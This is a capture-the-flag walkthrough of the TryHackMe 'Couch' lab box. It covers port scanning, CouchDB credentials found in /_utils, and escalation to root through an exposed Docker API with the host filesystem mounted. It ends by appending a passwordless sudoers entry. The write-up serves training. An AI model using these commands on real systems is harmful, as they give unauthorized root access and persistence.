[THM] : Couch Walkthrough
Initial Recon:
rustscan -a 10.10.128.127 -- -A -sV -sC -Pn -oN nmapinit.txt# Nmap 7.92 scan initiated Sat Feb 11 09:53:17 2023 as: nmap -vvv -p 22,5984 -A -sV -sC -Pn -oN nmapinit.txt 10.10.128.127
Nmap scan report for 10.10.128.127
Host is up, received user-set (0.17s latency).
Scanned at 2023-02-11 09:53:17 +0545 for 17s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMXnGZUnLWqLZb8VQiVH0z85lV+G4KY5l5kKf1fS7YgSnfZ+k3CRjAZPuGceg5RQEUbOMCm+0u4SDyIEbwwAXGv0ORK4/VEIyJlZmtlqeyASwR8ML4yjdGqinqOUZ3jN/ZIg4veJ02nr86GZP+Nto0TZt7beaIxykMEZHTdo0CctdKLIet7PpvwG4F5Tn9MBoys9pUjfpcnwbf91Tv6i56Gipo07jKgb5vP8Nl1TXPjWB93WNW2vWEQ1J4tiyZlBeLOaNaEbxvNQFnKxjVYiiLCbcofwSdrwZ7/+sIy5BdiNW+k81rBN3OqaQNZ8urFaiXXf/ukRr/hhjY5a6m0MHn
| 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNTR07g3p8MfnQVnv8uqj8GGDH6VoSRzwRFflMbEf3WspsYyVipg6vtNQMaq5uNGUXF8ubpsnHeJA+T3RilTLXc=
| 256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLUyz2Tpwc5qPuFxV+HnGBeqLC6NWrmpmGmE0hk7Hlj
5984/tcp open http syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 2AB2AAE806E8393B70970B2EAACE82E0
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 11 09:53:34 2023 -- 1 IP address (1 host up) scanned in 17.99 secondsWe can see couchdb is running is port 5984. Upon enumerating directories, I found /_utils directory that contained a username and password.
I tried the username and password on ssh and logged in as ssh user atena. Moving further to escalate privilege on the box, I checked for files having setuid bit set but didn’t got any interesting result.
find / -type f -perm -4000 2> /dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
We can see some more ports listening on 42602 and 2375 which is probably docker container.
Enumerating the machine, I found a docker command ran by atena in .bash_history file.
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpineWe can see that the mount point of the docker container is set to /mnt directory and is ran by privileged user. I ran the command and got a root shell in the docker container.
atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # whoami
rootWe can now read the root flag. But remember user atena wasn’t allowed to run “sudo -l”. We can add atena to sudoers file :D since the container is mounted to /mnt directory.
echo "atena ALL=(ALL) NOPASSWD: ALL" >> /mnt/etc/sudoers
Much better :D .
